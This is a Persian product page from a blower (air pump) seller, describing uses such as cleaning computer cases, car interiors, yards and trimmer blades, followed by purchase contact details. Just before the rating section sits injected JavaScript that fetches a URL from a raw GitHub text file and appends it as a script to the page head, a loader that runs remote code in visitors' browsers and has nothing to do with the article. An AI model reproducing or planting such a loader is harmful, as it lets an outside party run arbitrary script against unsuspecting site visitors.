بلوور ها ( پمپ های هوا ) در چه کار های استفاده می شود
بلوور ها

بلوور ها ( پمپ های هوا ) در چه کار های استفاده می شود

  • در برخی از مشاغل هنگام کار، بلوور ها گرد و غبار و ذرات ریزی تولید می شود که روی سطح کار و فضای کارگاه و یا مواردی مشابه می نشیند و نیاز است برای اینکه کارها به شکل تمیزی انجام شود این بلوور ها گرد و خاک ها و ذرات ریز مختلف را از محیط کار پاک کنیم. برای این کار نیاز به ابزاری است که بتواند کار دمندگی و مکندگی را انجام دهد.

    کاربرد بلوور در صنایع

    دستگاه دمنده یا مکنده هوا یا همان بلوبر از ابزارآلات برقی است که در صنایع مختلف و موارد متنوعی از آن استفاده می شود و عمده استفاده از آن نیز هوادهی و مکیدن هوا است. از جمله مهم ترین کارها و کاربرد های بلوئر می توان به مشاغلی مانند نجاری، کارواش ها و … اشاره کرد و در ادامه به مهم ترین این کاربرد ها با ذکر مثال اشاره می کنیم.

    پمپ هوا شامل موارد صنعتی نیز می شوند که کاربرد آنها بسیار وسیع و گستره است و دارای حجم های بزرگی نیز می باشند. بلور های صنعتی در صنایع بزرگ و عظیم در قالب هواکش دمنده و مکنده استفاده می شوند که از جمله می توان به هواکش های صنعتی در تونل ها اشاره کرد.

    بلوور ها

    در ادامه به کاربرد عمومی و پر استفاده بلوور ها اشاره می کنیم و هر کدام را مختصر توضیح می دهیم:

    1. پاک سازی قطعات کامپیورتر: در صنعت IT و موارد مشابه آن و برای پاک کردن گرد و غبار های موجود در مدارهای الکتریکی و کیس ها از دستگاه بلوور استفاده می شود و در مدت زمان کمی، محیط کیس و مدار را از گرد و غبار هایی که ممکن است به سیستم آسیب برساند پاکیزه می کنند.
    2. پاک کردن داخل خودرو: در کارواش ها و استفاده های خانگی برای پاک کردن و تمیز کردن محیط داخلی خودرو و همچنین موتور آن از هواده استفاده می شود تا بتوان محیط خودرو و موتور را از گرد و خاک ها و ذرات ریز پاکسازی کرد.
    3. پاکسازی خانه: در برخی از موارد برای پاک کردن محیط بیرونی از برگ ها و خرده ریز های سنگ و پلاستیک از دستگاه بلوور استفاده می شود.
    4. پاک سازی ماشین حاشیه زن: هنگام کار با ماشین حاشیه زن خورده هایی از چمن ها روی تیغه های آن می چسبد که تمیز کردن آن با دست خطرناک است به همین خاطر از بلوور یا هواده برای پاک کردن تیغه های حاشیه زن استفاده می شود.
    5. باد کردن دستگاه های بادی: برای باد کردن ارک ها تشک های ورزشی نیز به کار می رود

    بلوور دو کاره

    شاید بگوید دستگاه که فقط یکار می باشد ولی یک مدل جدید از پمپ ها 2 زمانه می باشد که هم می توانید به عنوان جاروبرقی و پمپ هوا از ان استفاده کنید.

    بلوور ها

    نحوه خرید بلوور ها

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این پمپ هوا به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید